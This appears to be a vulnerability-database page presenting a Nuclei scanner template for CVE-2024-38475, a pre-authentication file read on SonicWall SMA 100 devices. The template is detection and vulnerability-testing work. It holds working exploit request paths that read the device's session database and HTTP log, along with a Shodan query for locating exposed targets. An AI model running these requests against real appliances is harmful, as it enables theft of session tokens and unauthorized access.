Sonicwall - Pre-Authentication Arbitrary File Read
CVE-2024-38475
Verified
Description
Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained.
Severity
Critical
CVSS Score
9.1
Exploit Probability
94%
Published Date
May 2, 2025
Template Author
shaikhyaser
CVE-2024-38475.yaml
id: CVE-2024-38475 info: name: Sonicwall - Pre-Authentication Arbitrary File Read author: shaikhyaser severity: critical description: | Improper escaping of output in mod_rewrite in Apache HTTP Server 2.4.59 and earlier allows an attacker to map URLs to filesystem locations that are permitted to be served by the server but are not intentionally/directly reachable by any URL, resulting in code execution or source code disclosure. Substitutions in server context that use a backreferences or variables as the first segment of the substitution are affected. Some unsafe RewiteRules will be broken by this change and the rewrite flag "UnsafePrefixStat" can be used to opt back in once ensuring the substitution is appropriately constrained. reference: - https://github.com/watchtowrlabs/watchTowr-vs-SonicWall-PreAuth-RCE-Chain/blob/main/watchTowr-vs-SonicWall-PreAuth-RCE-Chain.py - https://labs.watchtowr.com/sonicboom-from-stolen-tokens-to-remote-shells-sonicwall-sma100-cve-2023-44221-cve-2024-38475/ - https://nvd.nist.gov/vuln/detail/CVE-2024-38475 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N cvss-score: 9.1 cve-id: CVE-2024-38475 cwe-id: CWE-116 epss-score: 0.93550 epss-percentile: 0.99828 metadata: verified: true max-request: 1 shodan-query: html:"SonicWall" html:"SMA" tags: cve,cve2024,sonicwal,sma-100,lfi,kev http: - method: GET path: - "{{BaseURL}}/tmp/temp.db%3f.1.1.1.1a-1.css" - "{{BaseURL}}/mnt/ram/var/log/httpd.log%3f.1.1.1.1a-1.css" matchers-condition: or matchers: - type: dsl dsl: - 'contains_all(body, "SQLite format","sessionId")' - 'status_code == 200' condition: and - type: dsl dsl: - 'contains_all(body, "mod_antiloris","[pid")' - 'contains(content_type, "text/plain")' - 'status_code == 200' condition: and # digest: 4a0a0047304502201867edff191f812392ff92e11793dfd510e4a3b54901bffed2803aeff4c342d3022100cfd2eda947063c3c9a791236ebb540e54d9d30462693535e5259952969c2e4ba:922c64590222798bb761d5b6d8e72950
9.1Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
CVE ID:
cve-2024-38475
CWE ID:
cwe-116